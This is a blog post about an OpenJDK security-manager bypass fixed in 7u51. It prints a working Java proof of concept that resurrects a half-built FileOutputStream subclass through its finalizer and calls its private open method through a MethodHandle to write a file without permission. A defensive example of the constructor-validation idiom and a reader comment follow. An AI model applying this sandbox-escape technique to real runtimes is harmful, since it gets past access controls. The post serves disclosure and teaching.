# Thursday, 16 January 2014
## Publicly Reported OpenJDK Vulnerability Fixed in 7u51

I tweeted a while ago about an OpenJDK vulnerability that was reported on one of the mailing lists.

Now that it has been fixed in 7u51, here is a simple PoC exploit:

```java
import java.lang.invoke.*;

class test extends java.io.FileOutputStream {
  // Holds the instance rescued by the finalizer below.
  static test t;

  test() throws Exception {
    // FileOutputStream("") cannot be opened, so this constructor throws
    // after the superclass constructor has already run.
    super("");
  }

  protected void finalize() {
    // The partially constructed instance is resurrected here.
    t = this;
  }

  public static void main(String[] args) throws Throwable {
    MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
                        MethodType.methodType(void.class, String.class, boolean.class));
    System.out.println(mh);
    // Catch variable renamed from "_" (no longer a legal identifier on current Java).
    try { new test(); } catch (Exception ignored) { }
    System.gc();
    System.runFinalization();
    mh.invokeExact(t, "oops.txt", false);
  }
}
```

Run this with a security manager enabled on a version earlier than 7u51 and it'll create the file oops.txt, even though the code doesn't have the rights to do so.
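The PoC depends on a subclass finalizer resurrecting an instance whose constructor threw. The following is an added example, not code from the post or from OpenJDK, showing the defensive idiom from the Java SE Secure Coding Guidelines (guideline 7-3) for exactly this case: validate in an argument expression of a `this(...)` call so that a failing check runs before any superclass constructor, which means no initialised object ever exists for a finalizer to capture. All class and method names are hypothetical.

```java
import java.util.concurrent.atomic.AtomicReference;

// Added example (hypothetical classes): contrasts a constructor that checks
// its input too late with one that checks before Object's constructor runs.
public class FinalizerGuardDemo {

    // Vulnerable shape: the check runs in the constructor body. By the time
    // it throws, Object.<init> has completed and HotSpot has already
    // registered the instance for finalization.
    static class UncheckedResource {
        final String path;
        UncheckedResource(String path) {
            if (path.isEmpty()) throw new IllegalArgumentException("empty path");
            this.path = path;
        }
    }

    // Hardened shape: checkPath(...) is evaluated as an argument of this(...),
    // i.e. before any superclass constructor. If it throws, the JVM never
    // completes Object.<init>, so there is nothing for finalize() to see.
    static class CheckedResource {
        final String path;
        CheckedResource(String path) {
            this(checkPath(path), true);
        }
        private CheckedResource(String path, boolean checked) {
            this.path = path;
        }
        private static String checkPath(String path) {
            if (path.isEmpty()) throw new IllegalArgumentException("empty path");
            return path;
        }
    }

    // Subclasses whose finalizer stashes `this`, the same move the PoC uses.
    static final AtomicReference<Object> captured = new AtomicReference<>();

    static class UncheckedSub extends UncheckedResource {
        UncheckedSub() { super(""); }               // throws inside the body
        @Override protected void finalize() { captured.set(this); }
    }

    static class CheckedSub extends CheckedResource {
        CheckedSub() { super(""); }                 // checkPath throws first
        @Override protected void finalize() { captured.set(this); }
    }

    // Attempts construction, forces finalization and reports whether a
    // half-built instance became reachable again. finalize() and
    // runFinalization() are deprecated on recent JDKs but still work.
    static boolean leaksPartialInstance(Runnable construct) {
        captured.set(null);
        try { construct.run(); } catch (IllegalArgumentException expected) { }
        for (int i = 0; i < 5 && captured.get() == null; i++) {
            System.gc();
            System.runFinalization();
        }
        return captured.get() != null;
    }

    public static void main(String[] args) {
        System.out.println("unchecked leaks: " + leaksPartialInstance(UncheckedSub::new));
        System.out.println("checked leaks:   " + leaksPartialInstance(CheckedSub::new));
    }
}
```

On HotSpot the first line reports `true` and the second `false`. The guideline offers two further options that need no constructor restructuring: declare the class `final`, or declare `protected final void finalize()` in the base class so a subclass cannot override it. Note that the idiom protects the object's own invariants; it does not by itself address the separate access-check problem in `MethodHandles.Lookup` that 7u51 fixed.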

Thursday, 16 January 2014 08:50:59 (W. Europe Standard Time, UTC+01:00) Comments [1]
Thursday, 16 January 2014 20:11:55 (W. Europe Standard Time, UTC+01:00)
Given the many different types of vulnerabilities I have seen on the JVM and the CLR I doubt that any in-process security boundary can be made to work. There's just too much surface area.

The BCL designers mistakenly tried to make many classes inheritable that just shouldn't be inherited from. Why should I ever inherit from FileStream? I can just inherit from Stream and wrap. Why inherit from Regex? Why inherit List<T>? Always a wrong design. Seal everything by default. Not just for security.
tobi